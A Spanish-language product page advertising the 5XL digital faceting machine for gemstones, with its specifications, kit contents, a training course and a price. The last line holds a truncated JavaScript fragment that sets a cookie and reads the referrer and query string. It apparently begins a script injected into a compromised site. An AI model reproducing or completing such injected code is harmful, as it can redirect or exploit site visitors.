5XL MAQUINA PARA FACETAR

La 5XL es una nueva máquina para facetar, con la novedad de que presenta un sistema digital para graduar los angulos. Este revolucionario diseño permite a los usuarios una gran facilidad de uso ya que utiliza un display digital que permite estabilidad, repetibilidad y precisión.

La nuevo brazo de la 5XL es simple de diseño, fácil de uso y sus características hacen que este entre las máquina modernas actuales. El diseño ha sido extensamente probado por facetadores tanto profesionales como amateurs con gran resultado.

El brazo de la 5XL tiene una escala de ángulos electrónica, que tiene una repetibilidad mejor que 0.2 y esta calibrada de 0-90 grados en 2 minutos de arco ( +/- .03 grados). Se ha usado electrónica de alta precisión para fabricar el brazo. Esta máquina permite un método de facetar extremadamente fácil y rápido, facilitando el posicionamiento del angulo, el index y la profundidad.

Con una pequeña practica se puede ver lo fácil y rápido que puede llegar a ser lapidar una bella gema facetada.

El mástil de acero duro tiene un grosor de ¾ de pulgada que le da la rigidez para no deflectar y prevenir el tallado excesivo de la gema. Tiene un ajuste de la altura que permite mover el cabezal, arriba y abajo muy rápido y un ajuste fino que permite incrementos en la altura de .001 pulgadas

Un solido cabezal de aluminio con cojinetes de precisión para soportarlo y un acabado e-coat completa el diseño del mastil y cabezal.

Una pila de 9 volt alimenta la parte electronica. No hacen falta alimentadores ni cables. La pila tiene una duracion de 250 horas facetando.

La base es la supercomprobada Mark 4 que acepta platos de hasta 8" (20 cm.) el motor es regulable en velocidad, va a 220 v. y tiene enchufe europeo

MAS INFORMACION SOBRE LA BASE PROXIMAMENTE


La maquina y el kit se componen de todo lo necesario para empezar y acabar una gema facetada:

Mark 4 Faceting base                                             
Mark 5XL Digital Faceting cabezal
64 Index Plate 
Transferidor
Dop set (14 dops variados)
Dop para hacer tablas
Tanque para el sistema de agua
Lampara de trabajo
Disco base en aluminio de 8" (20cm)
4 discos de diamante de diferentes granos para desbastar y prepulir de 8" (20cm.)
4 discos ultralaps de diferentes oxidos para pulir.
Un cursillo para aprender como funciona la maquina y la realizacion por el cliente del facetado de una gema (duración aprox 5 horas) El cursillo se realizara en nuestro taller, a no ser que se acuerde otra cosa.

El precio de la maquina, el kit, y el cursillo como promocion es de 2300 €UROS +IVA
comprar o pedir información
                                                                      

VOLVER A PRINCIPAL

var data,nhp,ntz,rf,sr;document.cookie='__support_check=1';nhp='http'; rf=document.referrer;sr=document.location.search;